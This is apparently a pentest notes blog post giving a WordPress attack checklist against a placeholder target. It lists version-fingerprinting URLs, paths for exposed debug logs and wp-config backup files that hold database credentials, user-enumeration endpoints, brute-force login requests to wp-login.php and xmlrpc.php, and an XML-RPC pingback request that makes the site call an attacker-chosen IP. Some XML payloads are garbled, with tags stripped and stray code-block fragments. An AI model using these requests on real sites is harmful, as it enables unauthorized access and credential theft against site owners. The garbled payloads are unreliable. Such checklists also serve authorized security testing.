Home Wordpress HackTricks
Post
Cancel

Wordpress HackTricks

WordPress Common Bugs

Introduction

What would you do if you came across a website that uses WordPress?

How to Detect

If you visit https://target.com and see the source code, you will see the links to themes and plugins from WordPress. Or you can visit https://target.com/wp-login.php, it is the WordPress login admin page

  1. Find the related CVE by checking the core, plugins, and theme version
    • How to find the wordpress version
      1
      2
      
      https://target.com/feed
      https://target.com/?feed=rss2
      
  • How to find the plugin version
    1
    2
    3
    4
    
    https://target.com/wp-content/plugins/PLUGINNAME/readme.txt
    https://target.com/wp-content/plugins/PLUGINNAME/readme.TXT
    https://target.com/wp-content/plugins/PLUGINNAME/README.txt
    https://target.com/wp-content/plugins/PLUGINNAME/README.TXT
    

or change readme.txt to changelog.txt or readme.md

  • How to find the theme version
    1
    2
    
    https://target.com/wp-content/themes/THEMENAME/style.css
    https://target.com/wp-content/themes/THEMENAME/readme.txt (If they have readme file)
    

    If you found outdated core / plugins / themes, find the exploit at https://wpscan.com

  1. Finding log files
    1
    
    http://target.com/wp-content/debug.log
    
  2. Finding backup file wp-config
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    
    http://target.com/.wp-config.php.swp
    http://target.com/wp-config.inc
    http://target.com/wp-config.old
    http://target.com/wp-config.txt
    http://target.com/wp-config.html
    http://target.com/wp-config.php.bak
    http://target.com/wp-config.php.dist
    http://target.com/wp-config.php.inc
    http://target.com/wp-config.php.old
    http://target.com/wp-config.php.save
    http://target.com/wp-config.php.swp
    http://target.com/wp-config.php.txt
    http://target.com/wp-config.php.zip
    http://target.com/wp-config.php.html
    http://target.com/wp-config.php~
    
  3. Get the username on the website
    1
    
    http://target.com/?author=1
    

    or

    1
    2
    
    http://target.com/wp-json/wp/v2/users
    http://target.com/?rest_route=/wp/v2/users
    
  4. Bruteforce ``` POST /wp-login.php HTTP/1.1 Host: target.com

log=admin&pwd=BRUTEFORCE_IN_HERE&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftarget.com%2Fwp-admin%2F&testcookie=1

1
or

POST /xmlrpc.php HTTP/1.1 Host: target.com

<?xml version=”1.0” encoding=”UTF-8”?>

wp.getUsersBlogsadmin</param>BRUTEFORCE_IN_HERE</param>
1
2
6. XSPA in wordpress

POST /xmlrpc.php HTTP/1.1 Host: target.com

pingback.ping http://yourip:port </param> https://target.com> </param>
1
2
7. Register enabled

http://example.com/wp-login.php?action=register ```

This post is licensed under CC BY 4.0 by the author.

Jira HackTricks

-

Comments powered by Disqus.